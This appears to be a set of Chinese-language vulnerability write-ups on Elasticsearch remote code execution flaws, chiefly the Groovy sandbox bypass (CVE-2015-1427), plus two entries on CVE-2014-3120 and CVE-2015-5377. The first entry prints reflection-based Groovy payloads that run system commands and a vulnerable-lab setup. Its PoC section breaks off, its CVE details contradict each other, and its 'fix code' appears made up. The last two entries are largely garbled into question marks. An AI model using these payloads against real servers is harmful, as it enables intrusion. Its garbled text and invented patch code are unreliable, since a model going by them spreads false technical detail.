一、漏洞简介¶
1.1 漏洞背景¶
Elasticsearch 早期版本支持使用 Groovy 脚本进行灵活的数据处理和查询。然而,Groovy 脚本的沙箱机制存在绕过漏洞,允许攻击者执行任意系统命令。
1.2 漏洞概述(包含 CVE 编号、危害等级、漏洞类型、披露时间等)¶
| 项目 | 内容 |
|---|---|
| 漏洞编号 | 暂无统一编号 |
| 危害等级 | 暂未找到权威信息 |
| 漏洞类型 | Groovy 脚本远程代码执行漏洞 |
| 披露时间 | 暂未找到权威信息 |
| 影响组件 | Elasticsearch 安全 |
- 漏洞类型: 远程代码执行 (RCE)
- CVE ID: CVE-2015-1427(沙箱绕过)
- 危害等级: 严重
- CVSS 评分: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
- CWE ID: CWE-94 (Code Injection)
- 发现时间: 2015年2月
核验说明:该问题未见统一 CVE 编号,本文结合原文与公开资料进行整理。
二、影响范围¶
2.1 受影响的版本¶
- Elasticsearch 1.2.0 - 1.4.2(CVE-2015-1427)
- Elasticsearch < 1.3.8
- Elasticsearch 1.4.0 - 1.4.2
2.2 不受影响的版本¶
- Elasticsearch ≥ 1.4.3(禁用动态 Groovy)
- Elasticsearch ≥ 1.3.8
- 现代版本默认禁用 Groovy
2.3 触发条件(如特定模块、特定配置、特定运行环境等)¶
- 启用了动态脚本(
script.disable_dynamic: false) - 攻击者能提交查询
- 目标服务器有出站网络连接(用于反弹 shell)
三、漏洞详情与原理解析¶
3.1 漏洞触发机制¶
Groovy 脚本在 Elasticsearch 中用于: - 自定义评分 - 聚合计算 - 数据更新操作
攻击链:
恶意查询 → Groovy 脚本执行 → 沙箱绕过 → Java Runtime.exec() → 系统命令执行
沙箱绕过利用 Java 反射机制:
// 沙箱禁止直接调用 Runtime
// 但通过反射可以绕过
Class.forName('java.lang.Runtime').getRuntime().exec('id')
3.2 源码层面的根因分析(结合源码与补丁对比)¶
漏洞代码(简化版):
// GroovyScriptEngine.java
public class GroovyScriptEngine {
private static final Set<String> BLACKLIST = Set.of(
"Runtime", "Process", "exec"
);
public Script compile(String scriptSource) {
// 沙箱检查(漏洞:黑名单不完整)
for (String forbidden : BLACKLIST) {
if (scriptSource.contains(forbidden)) {
throw new SecurityException("Script contains forbidden terms");
}
}
// 编译脚本
GroovyClassLoader loader = new GroovyClassLoader();
return loader.parseClass(scriptSource).newInstance();
}
}
问题: - 黑名单机制不安全(可用反射绕过) - 未限制 Java 类加载 - 未限制反射调用
绕过方法:
// 方法1:反射绕过
java.lang.Class.forName('java.lang.Runtime')
.getMethod('exec', String.class)
.invoke(
java.lang.Class.forName('java.lang.Runtime')
.getMethod('getRuntime')
.invoke(null),
'whoami'
)
// 方法2:字符串拼接绕过黑名单
def cmd = 'who' + 'ami';
Runtime.getRuntime().exec(cmd)
// 方法3:使用 ScriptEngine
new javax.script.ScriptEngineManager()
.getEngineByName('js')
.eval('java.lang.Runtime.getRuntime().exec("id")')
修复代码(1.4.3+):
public class GroovyScriptEngine {
private static final Set<String> WHITELIST = Set.of(
"doc", "params", "_score", "_source"
);
public Script compile(String scriptSource, SecurityManager sm) {
// 白名单检查
ASTNode ast = parseAST(scriptSource);
validateAST(ast, WHITELIST);
// 使用安全管理器
GroovyClassLoader loader = new GroovyClassLoader();
loader.setShouldRecompile(false);
// 禁用危险特性
CompilerConfiguration config = new CompilerConfiguration();
config.setDisabledGlobalASTTransformations(
Set.of("java.lang.Runtime", "java.lang.Process")
);
return loader.parseClass(scriptSource, config).newInstance();
}
private void validateAST(ASTNode node, Set<String> allowed) {
// 递归验证 AST,只允许安全操作
}
}
四、漏洞复现(可选)¶
4.1 环境搭建¶
# 启动受影响版本
docker run -d --name es-groovy-rce \
-p 9200:9200 \
elasticsearch:1.4.2
# 确认动态脚本已启用(默认)
curl http://target:9200/_nodes/settings?pretty | grep script
4.2 PoC 演示与测试过程¶
基本命令执行:
```bash
执行 who¶
五、修复建议与缓解措施¶
5.1 官方版本升级建议¶
- 暂未找到权威信息,建议以厂商安全公告、修复提交记录或发布说明为准。
5.2 临时缓解方案(如修改配置文件、关闭相关模块、增加 WAF 规则等)¶
- 在完成版本升级前,建议将相关服务限制在可信网络边界内,并最小化暴露面。
- 对高风险接口、插件或调试功能实施临时下线、访问控制与日志监控。
六、参考信息 / 参考链接¶
6.1 官方安全通告¶
- 暂未找到可直接引用的官方安全通告,请优先关注项目安全公告、发布说明与修复分支。
6.2 其他技术参考资料¶
- http://target:9200/_nodes/settings?pretty
Elasticsearch Elasticsearch Remote Code Execution Vulnerability?CVE-2014-3120?¶
??????¶
1.1 ????¶
Elasticsearch ???????????? CVE-2014-3120 ??????????????????????? HIGH?CVSS 8.1???? CISA KEV ?????
1.2 ??????? CVE ???????????????????¶
| ?? | ?? |
|---|---|
| ???? | CVE-2014-3120 |
| ???? | HIGH |
| CVSS ?? | 8.1 |
| ???? | CWE-284 |
| ???? | 2014-07-28 |
| ???? | Elasticsearch |
| CISA KEV | ??? |
| KEV ???? | Elasticsearch Remote Code Execution Vulnerability |
| KEV ???? | 2022-04-15 |
??????¶
2.1 ??????¶
elasticsearch:elasticsearch:*, < 1.2
2.2 ???????¶
- NVD / CISA ????????????????????????????????????????
2.3 ????????????????????????¶
- ????????????????????????
- ?????????????????????????????????????
???????????¶
3.1 ??????¶
- NVD ?????The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own inde...
- ?????? CISA KEV ???????????????????????????????
3.2 ????????????????????¶
- ?????????????CWE-284?
- NVD / CISA ???????????? diff???????????????????????????????
??????????¶
4.1 ????¶
- ??????????????????????????????????????????
4.2 PoC ???????¶
- ? CISA KEV ????????????????? KEV ????? PoC?
- ??????????????????????????????????????????
???????????¶
5.1 ????????¶
- ???????????????????????????
- ??????????????????????????????????????
5.2 ????????????????????????????¶
- ??????????????????????
- ???????????????????????? WAF ???
- ????????????????????????????
?????? / ????¶
- https://nvd.nist.gov/vuln/detail/CVE-2014-3120
- https://www.cve.org/CVERecord?id=CVE-2014-3120
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog
- http://bouk.co/blog/elasticsearch-rce/
- http://www.exploit-db.com/exploits/33370
- http://www.osvdb.org/106949
- http://www.rapid7.com/db/modules/exploit/multi/elasticsearch/script_mvel_rce
- http://www.securityfocus.com/bid/67731
Elasticsearch ???????CVE-2015-5377?¶
??????¶
1.1 ????¶
Elasticsearch ???????????? CVE-2015-5377 ??????????????????????? CRITICAL?CVSS 9.8?
1.2 ??????? CVE ???????????????????¶
| ?? | ?? |
|---|---|
| ???? | CVE-2015-5377 |
| ???? | CRITICAL |
| CVSS ?? | 9.8 |
| ???? | CWE-74 |
| ???? | 2018-03-06 |
| ???? | Elasticsearch |
??????¶
2.1 ??????¶
elastic:elasticsearch:*, < 1.6.1
2.2 ???????¶
- NVD / CISA ????????????????????????????????????????
2.3 ????????????????????????¶
- ????????????????????????
- ?????????????????????????????????????
???????????¶
3.1 ??????¶
- NVD ?????Elasticsearch before 1.6.1 allows remote attackers to execute arbitrary code via unspecified vectors involving the transport protocol. NOTE: ZDI appears to claim that CVE-2015-3253 and CVE-2015-5377 are the same vulnerability
- ??????????????????????????? PoC ???
3.2 ????????????????????¶
- ?????????????CWE-74?
- NVD / CISA ???????????? diff???????????????????????????????
??????????¶
4.1 ????¶
- ??????????????????????????????????????????
4.2 PoC ???????¶
- ? CISA KEV ????????????????? KEV ????? PoC?
- ??????????????????????????????????????????
???????????¶
5.1 ????????¶
- ???????????????????????????
- ??????????????????????????????????????
5.2 ????????????????????????????¶
- ??????????????????????
- ???????????????????????? WAF ???
- ????????????????????????????
?????? / ????¶
- https://nvd.nist.gov/vuln/detail/CVE-2015-5377
- https://www.cve.org/CVERecord?id=CVE-2015-5377
- http://www.securityfocus.com/bid/75938
- http://www.zerodayinitiative.com/advisories/ZDI-15-365/
- https://discuss.elastic.co/t/elasticsearch-remote-code-execution-cve-2015-5377/25736
- https://github.com/elastic/elasticsearch/commit/bf3052d14c874aead7da8855c5fcadf5428a43f2